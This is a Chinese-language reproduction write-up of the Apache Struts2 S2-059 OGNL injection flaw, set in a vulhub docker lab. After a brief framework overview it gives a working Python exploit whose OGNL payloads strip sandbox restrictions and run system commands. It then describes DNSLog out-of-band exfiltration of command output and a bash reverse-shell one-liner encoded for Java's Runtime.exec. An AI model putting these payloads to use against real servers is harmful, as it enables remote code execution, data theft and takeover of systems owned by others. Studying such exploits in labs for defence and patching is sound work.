Skip to content

Latest commit

 

History

History
60 lines (32 loc) · 4.14 KB

Apache Struts2-059.md

File metadata and controls

60 lines (32 loc) · 4.14 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

文章来****源: Admin Team

s2-059

Struts2介绍

是一个基于 MVC 设计模式的 Web 应用框架,它本质上相当于一个 servlet,在 MVC 设计模式中,Struts2作为控制器 (Controller) 来建立模型与视图的数据交互。Struts 2 是 Struts 的下一代产品,是在 struts 1 和 WebWork 的技术基础上进行了合并的全新的 Struts 2 框架。其全新的 Struts 2 的体系结构与 Struts 1 的体系结构差别巨大。Struts 2 以 WebWork 为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与 ServletAPI 完全脱离开,所以 Struts 2 可以理解为 WebWork 的更新产品。虽然从 Struts 1 到 Struts 2 有着非常大的变化,但是相对于 WebWork,Struts 2 的变化很小。

st2-059 介绍

2020 年 8 月 13 日, Apache 官方发布了一则公告, 该公告称 Apache Struts2使用某些标签时, 会对标签属性值进行二次表达式解析, 当标签属性值使用了 %{skillName} 并且 skillName 的值用户可以控制, 就会造成 OGNL 表达式执行。

漏洞复现

vulunmb 拉环境

vulhub/Struts2/s2-059 docker-compose up -d  // 启动漏洞环境

图 1. docker 启动漏洞环境

图 2. s2-059 漏洞环境

EXP 地址: https://vulhub.org/#/environments/`Struts2`/s2-059/ 官网给的 exp 是没有回显的

import requestsurl = "http://127.0.0.1:8080"data1 = {    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = {    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"}res1 = requests.post(url, data=data1)# print(res1.text)res2 = requests.post(url, data=data2)# print(res2.text)

可以进行修改 修改为 ping xxx.dnslog.cn 这个可以直接执行坑点 由于是 java 的需要进行编码 将其名带外输出

whoami.koeep8.dnslog.cn 在线编码:http://www.jackson-t.ca/runtime-exec-payloads.html![](https://mmbiz.qpic.cn/mmbiz_png/b4zGuE1C5nacib7rHjsibFVDa08YibfaOiaqFo7RA5xv2037f14icnPd1aJgicmExry9CrGD8G23RtFeX7WvlpkHCn1A/640?wx_fmt=png)

图 3. base64 编码截图

攻击测试

反弹 shell

bash -i >& /dev/tcp/Your ip/Your port 0>&1

base 编码随后替换

图 3. 反弹 shell 成功